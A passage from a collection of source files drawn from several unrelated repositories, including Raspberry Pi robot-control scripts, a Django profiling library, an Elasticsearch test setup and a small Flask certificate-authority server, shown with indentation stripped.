GPIO.output(13, False)
GPIO.output(15, False)
GPIO.output(12, False)
GPIO.output(16, False)
GPIO.output(18, False)
GPIO.output(22, False)
def backup(backTime):
GPIO.output(7, False)
GPIO.output(11, False)
GPIO.output(13, False)
GPIO.output(15, False)
GPIO.output(12, False)
GPIO.output(16, False)
GPIO.output(18, False)
GPIO.output(22, False)
GPIO.output(11, True)
GPIO.output(15, True)
GPIO.output(16, True)
GPIO.output(22, True)
time.sleep(backTime)
GPIO.output(7, False)
GPIO.output(11, False)
GPIO.output(13, False)
GPIO.output(15, False)
GPIO.output(12, False)
GPIO.output(16, False)
GPIO.output(18, False)
GPIO.output(22, False)
def move(dist):
if dist >= 10:
char = screen.getch()
if char == curses.KEY_UP:
forward()
elif char == curses.KEY_DOWN:
backward()
elif char == curses.KEY_LEFT:
left()
elif char == curses.KEY_RIGHT:
right()
elif char == 32 or char == 10:
stop()
else:
backup(1)
def scan_for_obstacles():
# tells the sensor to fire a burst of sound
GPIO.output(TRIG, True)
time.sleep(0.00001)
GPIO.output(TRIG, False)
if GPIO.input(ECHO) == 1:
start = time.time()
while GPIO.input(ECHO) == 1:
if time.time() - start > 0.25:
break
else:
pass
stop = time.time()
global distance
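        # convert the round-trip echo time to cm: the speed of sound (~34300 cm/s)
        # halved for the out-and-back path gives the ~17000 factor below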
distance = (stop-start) * 17000
else:
global distance
distance = 11
return distance
def Main():
try:
while True:
dist2 = scan_for_obstacles()
move(dist2)
screen.addstr(5,0,str(dist2))
finally:
# shut down cleanly
curses.nocbreak(); screen.keypad(0); curses.echo()
curses.endwin()
GPIO.cleanup()
if __name__ == '__main__':
Main()
```
#### File: autopack/test_files/multi-threading_test.py
```python
from threading import Thread
import time
def timer(name, delay, repeat):
print "Timer: " + name + " Started"
while repeat > 0:
time.sleep(delay)
print name + ": " + str(time.ctime(time.time()))
repeat -= 1
print "Timer: " + name + " Completed"
def Main():
t1 = Thread(target=timer, args=("Timer1", 1, 5))
t2 = Thread(target=timer, args=("Timer2", 2, 5))
t1.start()
t2.start()
print "main is done"
if __name__ == '__main__':
Main()
```
#### File: autopack/test_files/threading_while_scanning.py
```python
import RPi.GPIO as GPIO
import time
from threading import Thread
distances = []
TRIG = 24
ECHO = 26
GPIO.setmode(GPIO.BOARD)
GPIO.setup(TRIG, GPIO.OUT) # trigger voltage setup
GPIO.setup(ECHO, GPIO.IN) # echo input setup
GPIO.output(TRIG, False)
distances = []
def scan_for_obstacles():
GPIO.setmode(GPIO.BOARD)
while True:
GPIO.setmode(GPIO.BOARD)
# tells the sensor to fire a burst of sound
GPIO.output(TRIG, True)
time.sleep(0.00001)
GPIO.output(TRIG, False)
while GPIO.input(ECHO) == 0:
pass
startTime = time.time()
while GPIO.input(ECHO) == 1:
pass
stopTime = time.time()
distance = (stopTime-startTime) * 17000
distances.append(distance)
time.sleep(0.025)
def move():
dist = distances[-1]
if dist <= 10:
print 'uh oh a-somebody toucha mah spagheett'
def Main():
try:
t1 = Thread(target = scan_for_obstacles)
t1.start()
t2 = Thread(target=move)
t2.start()
t2.join()
print distances
except KeyboardInterrupt:
# shut down cleanly
GPIO.cleanup()
if __name__ == '__main__':
Main()
```
#### File: autopack/test_files/voltage-divider.py
```python
def divider(vin,vout,r1):
r2 = ((vout)*(r1))/(vin-vout)
return r2
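# e.g. divider(10, 5, 1000) -> 1000: with r1 = 1000 ohm, a 1000 ohm r2 divides 10 V down to 5 V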
vin = int(raw_input('vin: '))
vout = int(raw_input('vout: '))
r1 = int(raw_input('r1: '))
print divider(vin, vout, r1)
``` |
{
"source": "joshdabosh/dhbridge",
"score": 3
} |
#### File: bridge/nacre/hangouts.py
```python
import hangups
class Hangouts:
def __init__(self, client):
self.client = client
async def start(self):
self.users, self.conversations = await hangups.build_user_conversation_list(self.client)
async def send(self, message, conversation, annotate=True, raw=False):
if annotate:
annotationType = 4
else:
annotationType = 0
if raw:
segments = [hangups.ChatMessageSegment(message)]
else:
segments = hangups.ChatMessageSegment.from_str(message)
request = hangups.hangouts_pb2.SendChatMessageRequest(
request_header=self.client.get_request_header(),
event_request_header=conversation._get_event_request_header(),
message_content=hangups.hangouts_pb2.MessageContent(
segment=[segment.serialize() for segment in segments]
),
annotation=[hangups.hangouts_pb2.EventAnnotation(
type=annotationType
)]
)
await self.client.send_chat_message(request)
def getConversation(self, cid=None, event=None):
if event:
cid = event.conversation_id.id
return self.conversations.get(cid)
def getUser(self, uid=None, event=None):
if event:
uid = event.sender_id.gaia_id
return self.users.get_user(hangups.user.UserID(uid, uid))
async def getContact(self, username=None):
userConvoList = await hangups.build_user_conversation_list(self.client) # Basically this lets you get a list of everyone in all your chats
userList, convoList = userConvoList # This is just extracting data
userList = userList.get_all() # Same as above
matches = [] # Now we start looping through data
for user in userList:
if username in (user.full_name).lower():
matches.append(user)
return matches
async def getConvList(self):
return self.conversations.get_all()
async def getGroupChats(self):
return [c for c in await self.getConvList() if len(c.users) > 2]
``` |
{
"source": "JoshData/crs-reports-website",
"score": 3
} |
#### File: JoshData/crs-reports-website/history_histogram.py
```python
import datetime
import json
import glob
# helper function to parse report dates
import pytz
us_eastern_tz = pytz.timezone('America/New_York')
def parse_dt(s):
dt = datetime.datetime.strptime(s, "%Y-%m-%dT%H:%M:%S")
return us_eastern_tz.localize(dt)
# Get the first and last version date of each report.
reports = []
for fn in glob.glob("reports/reports/*.json"):
with open(fn) as f:
r = json.load(f)
d1 = parse_dt(r["versions"][0]["date"])
d2 = parse_dt(r["versions"][-1]["date"])
reports.append((r["id"], d1, d2))
# Sort and output the longest duration reports.
reports.sort(key = lambda r : r[2]-r[1])
for r, d1, d2 in reports[0:10]:
print(r, (d1-d2).days/365.25, "years", d2.isoformat(), d1.isoformat())
# Output a histogram of difference from first to last date.
factor = 365.25
from collections import defaultdict
histogram = defaultdict(lambda : 0)
for r, d1, d2 in reports:
delta_days = (d1-d2).total_seconds() / (60*60*24)
bin = int(delta_days/factor)
histogram[bin] += 1
hist_max = max(histogram.values())
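# one row per whole-year bin; bars are scaled so the largest bin spans 50 '#' characters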
for delta_days, count in sorted(histogram.items()):
print(str(delta_days).rjust(2), "#"*round(50*count/hist_max))
``` |
{
"source": "JoshData/silk",
"score": 2
} |
#### File: silk/silk/collector.py
```python
from threading import local
import cProfile, pstats, StringIO
from six import with_metaclass
from silk import models
from silk.config import SilkyConfig
from silk.errors import SilkNotConfigured, SilkInternalInconsistency
from silk.models import _time_taken
from silk.singleton import Singleton
TYP_SILK_QUERIES = 'silk_queries'
TYP_PROFILES = 'profiles'
TYP_QUERIES = 'queries'
class DataCollector(with_metaclass(Singleton, object)):
"""
Provides the ability to save all models at the end of the request. We cannot save during
the request due to the possibility of atomic blocks and hence must collect data and perform
the save at the end.
"""
def __init__(self):
super(DataCollector, self).__init__()
self.local = local()
self._configure()
@property
def request(self):
return getattr(self.local, 'request', None)
def get_identifier(self):
self.local.temp_identifier += 1
return self.local.temp_identifier
@request.setter
def request(self, value):
self.local.request = value
def _configure(self):
self.local.objects = {}
self.local.temp_identifier = 0
@property
def objects(self):
return getattr(self.local, 'objects', None)
@property
def queries(self):
return self._get_objects(TYP_QUERIES)
@property
def silk_queries(self):
return self._get_objects(TYP_SILK_QUERIES)
def _get_objects(self, typ):
objects = self.objects
if objects is None:
self._raise_not_configured('Attempt to access %s without initialisation.' % typ)
if not typ in objects:
objects[typ] = {}
return objects[typ]
@property
def profiles(self):
return self._get_objects(TYP_PROFILES)
@property
def silk_queries(self):
return self._get_objects('silk_queries')
def configure(self, request=None):
self.request = request
self._configure()
if SilkyConfig().SILKY_PYTHON_PROFILER:
self.pythonprofiler = cProfile.Profile()
self.pythonprofiler.enable()
def clear(self):
self.request = None
self._configure()
def _raise_not_configured(self, err):
raise SilkNotConfigured(err + ' Is the middleware installed correctly?')
def register_objects(self, typ, *args):
for arg in args:
ident = self.get_identifier()
objects = self.objects
if objects is None:
# This can happen if the SilkyMiddleware.process_request is not called for whatever reason.
# Perhaps if another piece of middleware is not playing ball.
                self._raise_not_configured('Attempt to register object of type %s without initialisation.' % typ)
if not typ in objects:
self.objects[typ] = {}
self.objects[typ][ident] = arg
def register_query(self, *args):
self.register_objects(TYP_QUERIES, *args)
def register_profile(self, *args):
self.register_objects(TYP_PROFILES, *args)
def _record_meta_profiling(self):
if SilkyConfig().SILKY_META:
num_queries = len(self.silk_queries)
query_time = sum(_time_taken(x['start_time'], x['end_time']) for _, x in self.silk_queries.items())
self.request.meta_num_queries = num_queries
self.request.meta_time_spent_queries = query_time
self.request.save()
def stop_python_profiler(self):
if hasattr(self, 'pythonprofiler'):
self.pythonprofiler.disable()
def finalise(self):
if hasattr(self, 'pythonprofiler'):
s = StringIO.StringIO()
ps = pstats.Stats(self.pythonprofiler, stream=s).sort_stats('cumulative')
ps.print_stats()
profile_text = s.getvalue()
profile_text = "\n".join(profile_text.split("\n")[0:256]) # don't record too much because it can overflow the field storage size
self.request.pyprofile = profile_text
for _, query in self.queries.items():
query_model = models.SQLQuery.objects.create(**query)
query['model'] = query_model
for _, profile in self.profiles.items():
profile_query_models = []
if TYP_QUERIES in profile:
profile_queries = profile[TYP_QUERIES]
del profile[TYP_QUERIES]
for query_temp_id in profile_queries:
try:
query = self.queries[query_temp_id]
try:
profile_query_models.append(query['model'])
except KeyError:
raise SilkInternalInconsistency('Profile references a query dictionary that has not '
'been converted into a Django model. This should '
'never happen, please file a bug report')
except KeyError:
raise SilkInternalInconsistency('Profile references a query temp_id that does not exist. '
'This should never happen, please file a bug report')
profile = models.Profile.objects.create(**profile)
if profile_query_models:
profile.queries = profile_query_models
profile.save()
self._record_meta_profiling()
def register_silk_query(self, *args):
self.register_objects(TYP_SILK_QUERIES, *args)
```
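A minimal sketch of the request lifecycle the collector above implies (configure, register, finalise), assuming a configured Django project with silk installed; the `silk_request` argument and the query dictionary fields are illustrative only, not a documented API:
```python
from silk.collector import DataCollector

def profile_one_request(silk_request):
    collector = DataCollector()        # Singleton: every call returns the same instance
    collector.configure(silk_request)  # Reset per-request state; start cProfile if enabled
    # ...while the view runs, instrumentation registers captured queries as plain dicts...
    collector.register_query({"query": "SELECT 1", "traceback": ""})  # illustrative fields
    collector.stop_python_profiler()
    collector.finalise()               # Turn the buffered dicts into models and save them
    collector.clear()
```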
#### File: silk/silk/models.py
```python
from collections import Counter
import json
from django.db import models
from django.db.models import DateTimeField, TextField, CharField, ForeignKey, IntegerField, BooleanField, F, \
ManyToManyField, OneToOneField, FloatField
from django.utils import timezone
from django.db import transaction
import sqlparse
# Separated out so it can be used in tests w/o models
def _time_taken(start_time, end_time):
d = end_time - start_time
return d.seconds * 1000 + d.microseconds / 1000
def time_taken(self):
return _time_taken(self.start_time, self.end_time)
class CaseInsensitiveDictionary(dict):
def __getitem__(self, key):
return super(CaseInsensitiveDictionary, self).__getitem__(key.lower())
def __setitem__(self, key, value):
super(CaseInsensitiveDictionary, self).__setitem__(key.lower(), value)
def update(self, other=None, **kwargs):
for k, v in other.items():
self[k] = v
for k, v in kwargs.items():
self[k] = v
def __init__(self, d):
super(CaseInsensitiveDictionary, self).__init__()
for k, v in d.items():
self[k] = v
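# CaseInsensitiveDictionary lower-cases keys on both write and read,
# e.g. CaseInsensitiveDictionary({"Content-Type": "text/html"})["content-type"] == "text/html"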
class Request(models.Model):
path = CharField(max_length=300, db_index=True)
query_params = TextField(blank=True, default='')
raw_body = TextField(blank=True, default='')
body = TextField(blank=True, default='')
method = CharField(max_length=10)
start_time = DateTimeField(default=timezone.now, db_index=True)
view_name = CharField(max_length=300, db_index=True, blank=True, default='')
end_time = DateTimeField(null=True, blank=True)
time_taken = FloatField(blank=True, null=True)
encoded_headers = TextField(blank=True, default='')
meta_time = FloatField(null=True, blank=True)
meta_num_queries = IntegerField(null=True, blank=True)
meta_time_spent_queries = FloatField(null=True, blank=True)
pyprofile = TextField(blank=True, default='')
@property
def total_meta_time(self):
return (self.meta_time or 0) + (self.meta_time_spent_queries or 0)
# defined in atomic transaction within SQLQuery save()/delete() as well
# as in bulk_create of SQLQueryManager
# TODO: This is probably a bad way to do this, .count() will prob do?
num_sql_queries = IntegerField(default=0)
@property
def time_spent_on_sql_queries(self):
# TODO: Perhaps there is a nicer way to do this with Django aggregates?
# My initial thought was to perform:
# SQLQuery.objects.filter.aggregate(Sum(F('end_time')) - Sum(F('start_time')))
        # However, this feature isn't available yet; there has been talk of using F objects
        # within aggregates for four years here: https://code.djangoproject.com/ticket/14030
# It looks like this will go in soon at which point this should be changed.
return sum(x.time_taken for x in SQLQuery.objects.filter(request=self))
@property
def headers(self):
if self.encoded_headers:
raw = json.loads(self.encoded_headers)
else:
raw = {}
return CaseInsensitiveDictionary(raw)
@property
def content_type(self):
return self.headers.get('content-type', None)
def save(self, *args, **kwargs):
if self.end_time and self.start_time:
interval = self.end_time - self.start_time
self.time_taken = interval.total_seconds() * 1000
super(Request, self).save(*args, **kwargs)
class Response(models.Model):
request = OneToOneField('Request', related_name='response', db_index=True)
status_code = IntegerField()
raw_body = TextField(blank=True, default='')
body = TextField(blank=True, default='')
encoded_headers = TextField(blank=True, default='')
@property
def content_type(self):
return self.headers.get('content-type', None)
@property
def headers(self):
if self.encoded_headers:
raw = json.loads(self.encoded_headers)
else:
raw = {}
return CaseInsensitiveDictionary(raw)
class SQLQueryManager(models.Manager):
def bulk_create(self, *args, **kwargs):
"""ensure that num_sql_queries remains consistent. Bulk create does not call
the model save() method and hence we must add this logic here too"""
if len(args):
objs = args[0]
else:
objs = kwargs.get('objs')
with transaction.commit_on_success():
request_counter = Counter([x.request_id for x in objs])
requests = Request.objects.filter(pk__in=request_counter.keys())
# TODO: Not that there is ever more than one request (but there could be eventually)
            # but perhaps there is a cleaner way of applying the increment from the counter without iterating
# and saving individually? e.g. bulk update but with diff. increments. Couldn't come up with this
# off hand.
for r in requests:
r.num_sql_queries = F('num_sql_queries') + request_counter[r.pk]
r.save()
save = super(SQLQueryManager, self).bulk_create(*args, **kwargs)
return save
class SQLQuery(models.Model):
query = TextField()
start_time = DateTimeField(null=True, blank=True, default=timezone.now)
end_time = DateTimeField(null=True, blank=True)
time_taken = FloatField(blank=True, null=True)
request = ForeignKey('Request', related_name='queries', null=True, blank=True, db_index=True)
traceback = TextField()
objects = SQLQueryManager()
@property
def traceback_ln_only(self):
return '\n'.join(self.traceback.split('\n')[::2])
@property
def formatted_query(self):
return sqlparse.format(self.query, reindent=True, keyword_case='upper')
# TODO: Surely a better way to handle this? May return false positives
@property
def num_joins(self):
return self.query.lower().count('join ')
@property
def tables_involved(self):
"""A rreally ather rudimentary way to work out tables involved in a query.
TODO: Can probably parse the SQL using sqlparse etc and pull out table info that way?"""
components = [x.strip() for x in self.query.split()]
tables = []
for idx, c in enumerate(components):
# TODO: If django uses aliases on column names they will be falsely identified as tables...
if c.lower() == 'from' or c.lower() == 'join' or c.lower() == 'as':
try:
nxt = components[idx + 1]
if not nxt.startswith('('): # Subquery
stripped = nxt.strip().strip(',')
if stripped:
tables.append(stripped)
except IndexError: # Reach the end
pass
return tables
@transaction.commit_on_success()
def save(self, *args, **kwargs):
if self.end_time and self.start_time:
interval = self.end_time - self.start_time
self.time_taken = interval.total_seconds() * 1000
if not self.pk:
if self.request:
self.request.num_sql_queries += 1
self.request.save()
super(SQLQuery, self).save(*args, **kwargs)
@transaction.commit_on_success()
def delete(self, *args, **kwargs):
self.request.num_sql_queries -= 1
self.request.save()
super(SQLQuery, self).delete(*args, **kwargs)
class BaseProfile(models.Model):
name = CharField(max_length=300, blank=True, default='')
start_time = DateTimeField(default=timezone.now)
end_time = DateTimeField(null=True, blank=True)
request = ForeignKey('Request', null=True, blank=True, db_index=True)
time_taken = FloatField(blank=True, null=True)
class Meta:
abstract = True
def save(self, *args, **kwargs):
if self.end_time and self.start_time:
interval = self.end_time - self.start_time
self.time_taken = interval.total_seconds() * 1000
super(BaseProfile, self).save(*args, **kwargs)
class Profile(BaseProfile):
file_path = CharField(max_length=300, blank=True, default='')
line_num = IntegerField(null=True, blank=True)
end_line_num = IntegerField(null=True, blank=True)
func_name = CharField(max_length=300, blank=True, default='')
exception_raised = BooleanField(default=False)
queries = ManyToManyField('SQLQuery', related_name='profiles', db_index=True)
dynamic = BooleanField(default=False)
@property
def is_function_profile(self):
return self.func_name is not None
@property
def is_context_profile(self):
return self.func_name is None
@property
def time_spent_on_sql_queries(self):
time_spent = sum(x.time_taken for x in self.queries.all())
return time_spent
``` |
{
"source": "joshdavies14/apollo",
"score": 3
} |
#### File: apollo/utils/utils.py
```python
from decimal import Decimal, InvalidOperation
from typing import Iterable
from config import CONFIG
def user_is_irc_bot(ctx):
return ctx.author.id == CONFIG.UWCS_DISCORD_BRIDGE_BOT_ID
def get_name_string(message):
# if message.clean_content.startswith("**<"): <-- FOR TESTING
if user_is_irc_bot(message):
return message.clean_content.split(" ")[0][3:-3]
else:
return f"{message.author.mention}"
def is_decimal(num):
try:
Decimal(num)
return True
except (InvalidOperation, TypeError):
return False
def pluralise(l, word, single="", plural="s"):
if len(l) > 1:
return word + plural
else:
return word + single
def filter_out_none(iterable: Iterable):
return [i for i in iterable if i is not None]
``` |
{
"source": "joshdavies89/e-commerce",
"score": 2
} |
#### File: src/products/models.py
```python
from django.db import models
# Create your models here.
class Product(models.Model):
title = models.CharField(max_length=120)
description = models.TextField(blank=True, null=True)
price = models.DecimalField(decimal_places=2, max_digits=20)
active = models.BooleanField(default=True)
#slug
#inventory
def __unicode__(self):
return self.title
``` |
{
"source": "joshdevins/eland",
"score": 2
} |
#### File: eland/tests/setup_tests.py
```python
import pandas as pd
from elasticsearch import helpers
from eland.common import es_version
from tests import (
ECOMMERCE_FILE_NAME,
ECOMMERCE_INDEX_NAME,
ECOMMERCE_MAPPING,
ELASTICSEARCH_HOST,
ES_TEST_CLIENT,
FLIGHTS_FILE_NAME,
FLIGHTS_INDEX_NAME,
FLIGHTS_MAPPING,
FLIGHTS_SMALL_FILE_NAME,
FLIGHTS_SMALL_INDEX_NAME,
TEST_MAPPING1,
TEST_MAPPING1_INDEX_NAME,
TEST_NESTED_USER_GROUP_DOCS,
TEST_NESTED_USER_GROUP_INDEX_NAME,
TEST_NESTED_USER_GROUP_MAPPING,
)
DATA_LIST = [
(FLIGHTS_FILE_NAME, FLIGHTS_INDEX_NAME, FLIGHTS_MAPPING),
(FLIGHTS_SMALL_FILE_NAME, FLIGHTS_SMALL_INDEX_NAME, FLIGHTS_MAPPING),
(ECOMMERCE_FILE_NAME, ECOMMERCE_INDEX_NAME, ECOMMERCE_MAPPING),
]
def _setup_data(es):
# Read json file and index records into Elasticsearch
for data in DATA_LIST:
json_file_name = data[0]
index_name = data[1]
mapping = data[2]
# Delete index
print("Deleting index:", index_name)
es.indices.delete(index=index_name, ignore=[400, 404])
print("Creating index:", index_name)
es.indices.create(index=index_name, body=mapping)
df = pd.read_json(json_file_name, lines=True)
actions = []
n = 0
print("Adding", df.shape[0], "items to index:", index_name)
for index, row in df.iterrows():
values = row.to_dict()
# make timestamp datetime 2018-01-01T12:09:35
# values['timestamp'] = datetime.strptime(values['timestamp'], '%Y-%m-%dT%H:%M:%S')
# Use integer as id field for repeatable results
action = {"_index": index_name, "_source": values, "_id": str(n)}
actions.append(action)
n = n + 1
if n % 10000 == 0:
helpers.bulk(es, actions)
actions = []
helpers.bulk(es, actions)
actions = []
print("Done", index_name)
def _update_max_compilations_limit(es, limit="10000/1m"):
print("Updating script.max_compilations_rate to ", limit)
if es_version(es) < (7, 8):
body = {"transient": {"script.max_compilations_rate": limit}}
else:
body = {
"transient": {
"script.max_compilations_rate": "use-context",
"script.context.field.max_compilations_rate": limit,
}
}
es.cluster.put_settings(body=body)
def _setup_test_mappings(es):
# Create a complex mapping containing many Elasticsearch features
es.indices.delete(index=TEST_MAPPING1_INDEX_NAME, ignore=[400, 404])
es.indices.create(index=TEST_MAPPING1_INDEX_NAME, body=TEST_MAPPING1)
def _setup_test_nested(es):
es.indices.delete(index=TEST_NESTED_USER_GROUP_INDEX_NAME, ignore=[400, 404])
es.indices.create(
index=TEST_NESTED_USER_GROUP_INDEX_NAME, body=TEST_NESTED_USER_GROUP_MAPPING
)
helpers.bulk(es, TEST_NESTED_USER_GROUP_DOCS)
if __name__ == "__main__":
# Create connection to Elasticsearch - use defaults
print("Connecting to ES", ELASTICSEARCH_HOST)
es = ES_TEST_CLIENT
_setup_data(es)
_setup_test_mappings(es)
_setup_test_nested(es)
_update_max_compilations_limit(es)
``` |
{
"source": "joshdickie/image-shuffler",
"score": 4
} |
#### File: joshdickie/image-shuffler/image-shuffler.py
```python
import random, string, os, math
from tkinter import *
from tkinter import ttk, messagebox
from PIL import Image
#window
root = Tk()
root.title("Random Image Grid Generator")
root.resizable(0, 0)
#################################### VARS ####################################
dir_path = os.path.dirname(os.path.realpath(__file__))
text_intro = ("This program takes a number of images of two distinct types, "
"and randomly arranges a selection of them in a grid. Please "
"ensure that the input images are placed in the appropriate "
"folder, are named appropriately, and are the same size.")
text_matrix_number = "Number of matrices:"
text_image_type_a = "Number of images of type a to be selected:"
text_image_type_b = "Number of images of type b to be selected:"
images_a = [] #list of image type a paths
images_b = [] #list of image type b paths
images_total = [] #combined list of paths
padding = 10 #space between images on grid
image_x = 0 #how many pixels wide the images are
image_y = 0 #how many pixels high the images are
matrix_x_pix = 0 #how many pixels wide the matrix is
matrix_y_pix = 0 #how many pixels high the matrix is
matrix_x = 0 #how many images wide the matrix is
matrix_y = 0 #how many images high the matrix is
#Tkinter objects
number_of_matrices = StringVar()
number_of_images_a = StringVar()
number_of_images_b = StringVar()
################################### FUNCTS ###################################
def main():
"""
generates a number (determined by the user) of randomized image
matrices (of size determined by the user), and saves them to
an "output" folder.
"""
global matrix_x, matrix_y
if inputs_valid():
if number_of_images_b.get() != "": #check if images_b empty
matrix_size = (int(number_of_images_a.get()) +
int(number_of_images_b.get()))
else:
matrix_size = int(number_of_images_a.get())
size_prime, matrix_x, matrix_y = square_distribution(matrix_size)
if size_prime:
messagebox.showwarning("Grid can not be constructed", (
"Error: grid of requested size can not be"
"constructed (type a + type b is prime)"))
else:
generate_image_matrices()
messagebox.showinfo("","done.")
def inputs_valid():
"""
checks that all inputs are valid, including:
- user entries
- images
"""
if entries_valid() and number_of_images_valid():
return True
else:
return False
def entries_valid():
"""
    verifies that user input is valid for:
        - Number of matrices
        - Number of images of type a and type b
"""
if ((number_of_matrices.get()).isdigit() and
(number_of_images_a.get()).isdigit() and
((number_of_images_b.get()).isdigit() or
(number_of_images_b.get() is ""))):
return True
else:
messagebox.showwarning("Invalid entries", (
"All input values must be "
"non-negative integers."))
return False
def number_of_images_valid():
"""
verifies that the number of images in the "type a" input folder is
greater than or equal to number_of_images_a. Does the same for
type b.
"""
if number_of_images_a_valid() and number_of_images_b_valid():
return True
else:
return False
def number_of_images_a_valid():
"""
verifies that the number of images in the "type a" input folder is
greater than or equal to number_of_images_a.
"""
counter = 0
with os.scandir(os.path.join(dir_path, "inputs", "type_a")) as filepaths:
for path in filepaths:
extension = os.path.splitext(path)[1].lower()
if extension == ".png" or extension == ".jpg":
counter += 1
if counter >= int(number_of_images_a.get()):
return True
else:
messagebox.showwarning("Invalid Image Inputs", (
"Not enough images of type a to create "
"requested grid."))
return False
def number_of_images_b_valid():
"""
verifies that the number of images in the "type b" input folder is
greater than or equal to number_of_images_b.
"""
counter = 0
with os.scandir(os.path.join(dir_path, "inputs", "type_b")) as filepaths:
for path in filepaths:
extension = os.path.splitext(path)[1].lower()
if extension == ".png" or extension == ".jpg":
counter += 1
if ((number_of_images_b.get() == "") or
(counter >= int(number_of_images_b.get()))):
return True
else:
messagebox.showwarning("Invalid Image Inputs", (
"Not enough images of type b to create "
"requested grid."))
return False
def square_distribution(size):
"""
Determines the "most square" x and y values which will make a grid of
the specified size.
args:
size - the size of the grid (int)
returns:
size_prime - True if size is prime (bool)
x - the x value of the most square distribution (int)
y - the y value of the most square distribution (int)
"""
x = math.ceil(math.sqrt(size))
while x < size:
if size % x != 0:
x += 1
else:
break
y = size//x
if x == size:
size_prime = True
else:
size_prime = False
return (size_prime, x, y)
def generate_image_matrices():
"""
generates and saves the specified number of matrices, using the
given input data.
"""
for i in range(int(number_of_matrices.get())):
clear_space()
populate_image_lists()
randomly_select_images()
get_image_data()
grid_frame = Image.new("RGB", (matrix_x_pix, matrix_y_pix), "white")
image_index = 0
for j in range(matrix_x):
for k in range(matrix_y):
img = Image.open(images_total[image_index])
grid_frame.paste(img, (padding + (j * (padding + image_x)),
padding + (k * (padding + image_y))))
image_index += 1
        save_path = os.path.join(dir_path, "outputs",
                                 number_of_images_a.get() + "a" +
                                 number_of_images_b.get() + "b_img" + str(i) + ".png")
grid_frame.save(save_path, "PNG")
def clear_space():
"""
clears the workspace for a new run
"""
global images_a, images_b, images_total
images_a = []
images_b = []
images_total = []
def populate_image_lists():
"""
populates images_a and images_b with the appropriate paths.
"""
with os.scandir(os.path.join(dir_path, "inputs", "type_a")) as filepaths:
for path in filepaths:
extension = os.path.splitext(path)[1].lower()
if extension == ".png" or extension == ".jpg":
images_a.append(path.path)
with os.scandir(os.path.join(dir_path, "inputs", "type_b")) as filepaths:
for path in filepaths:
extension = os.path.splitext(path)[1].lower()
if extension == ".png" or extension == ".jpg":
images_b.append(path.path)
def randomly_select_images():
"""
combines images_a and images_b by randomly selecting the images which
will be used to generate the image grid, then shuffling the combined
list.
"""
global images_a, images_b, images_total
images_a = random.sample(images_a, int(number_of_images_a.get()))
if number_of_images_b.get() != "": #check if images_b empty
images_b = random.sample(images_b, int(number_of_images_b.get()))
else:
images_b = []
images_total = images_a + images_b
random.shuffle(images_total)
def get_image_data():
"""
gets relevant image data:
- size (width and height) of images
- size (width and height) of the grid
"""
global image_x, image_y, matrix_x_pix, matrix_y_pix
image_x, image_y = Image.open(images_total[0]).size
matrix_x_pix = (matrix_x*image_x) + ((matrix_x + 1) * padding)
matrix_y_pix = (matrix_y*image_y) + ((matrix_y + 1) * padding)
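    # e.g. 100x100 px images with padding 10 in a 4x3 grid give a 450x340 px canvas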
################################## GUI STUFF #################################
#Widgets
frame_intro = ttk.Frame(root, padding = 5, borderwidth = 2, relief = SUNKEN)
frame_inputs = ttk.Frame(root)
label_intro = ttk.Label(frame_intro, text = text_intro, justify = CENTER, wraplength = 450)
label_matrix_number = ttk.Label(frame_inputs, text = text_matrix_number, justify = RIGHT)
label_image_type_a = ttk.Label(frame_inputs, text = text_image_type_a, justify = RIGHT)
label_image_type_b = ttk.Label(frame_inputs, text = text_image_type_b, justify = RIGHT)
entry_matrix_number = ttk.Entry(frame_inputs, textvariable = number_of_matrices, width = 4)
entry_image_type_a = ttk.Entry(frame_inputs, textvariable = number_of_images_a, width = 4)
entry_image_type_b = ttk.Entry(frame_inputs, textvariable = number_of_images_b, width = 4)
button_go = ttk.Button(frame_inputs, text = "Go", command = main)
#Placement
frame_intro.grid(column = 1, row = 1, sticky = (N, S, E, W))
frame_inputs.grid(column = 1, row = 2, sticky = (N, S, E, W))
label_intro.grid(column = 1, row = 1, columnspan = 4, sticky = (N, S, E, W))
label_matrix_number.grid(column = 1, row = 3, sticky = E)
label_image_type_a.grid(column = 1, row = 4, sticky = E)
label_image_type_b.grid(column = 1, row = 5, sticky = E)
entry_matrix_number.grid(column = 2, row = 3)
entry_image_type_a.grid(column = 2, row = 4)
entry_image_type_b.grid(column = 2, row = 5)
button_go.grid(column = 5, row = 6)
#Main Loop
root.mainloop()
``` |
{
"source": "joshdk/mtls-server",
"score": 3
} |
#### File: joshdk/mtls-server/server.py
```python
from configparser import ConfigParser
import os
import json
from cryptography.hazmat.primitives import serialization
from flask import Flask
from flask import request
from cert_processor import CertProcessor
from cert_processor import CertProcessorKeyNotFoundError
from cert_processor import CertProcessorInvalidSignatureError
from cert_processor import CertProcessorUntrustedSignatureError
from handler import Handler
from logger import logger
from utils import get_config_from_file
__author__ = "<NAME> <<EMAIL>>"
app = None
handler = None
def create_app(config=None):
app = Flask(__name__)
handler = Handler(config)
with open("VERSION", "r") as f:
version = str(f.readline().strip())
# This will generate a CA Certificate and Key if one does not exist
try:
cert = handler.cert_processor.get_ca_cert()
except CertProcessorKeyNotFoundError:
# Auto-gen a new key and cert if one is not presented and this is the
# first call ever made to the handler
key = handler.cert_processor.get_ca_key()
cert = handler.cert_processor.get_ca_cert(key)
@app.route("/", methods=["POST"])
def create_handler():
body = request.get_json()
if body["type"] == "CERTIFICATE":
return handler.create_cert(body)
if body["type"] == "USER":
return handler.add_user(body)
if body["type"] == "ADMIN":
return handler.add_user(body, is_admin=True)
@app.route("/", methods=["DELETE"])
def delete_handler():
body = request.get_json()
if body["type"] == "CERTIFICATE":
return handler.revoke_cert(body)
if body["type"] == "USER":
return handler.remove_user(body)
if body["type"] == "ADMIN":
return handler.remove_user(body, is_admin=True)
@app.route("/ca", methods=["GET"])
def get_ca_cert():
cert = handler.cert_processor.get_ca_cert()
cert = cert.public_bytes(serialization.Encoding.PEM).decode("UTF-8")
return (
json.dumps({"issuer": handler.config.get("ca", "issuer"), "cert": cert}),
200,
)
@app.route("/crl", methods=["GET"])
def get_crl():
crl = handler.cert_processor.get_crl()
return crl.public_bytes(serialization.Encoding.PEM).decode("UTF-8")
@app.route("/version", methods=["GET"])
def get_version():
return json.dumps({"version": version}), 200
return app
if __name__ == "__main__":
config_path = os.getenv("CONFIG_PATH", None)
if config_path:
config = get_config_from_file(config_path)
else:
config = get_config_from_file("config.ini")
app = create_app(config)
app.run(port=config.get("mtls", "port", fallback=4000))
``` |
{
"source": "joshdoman/twitter-legitimacy",
"score": 3
} |
#### File: backend/functions/SecondDegreeTwitter.py
```python
import json
import sys
from FollowersAPI import get_followers_for_id, get_following_for_id
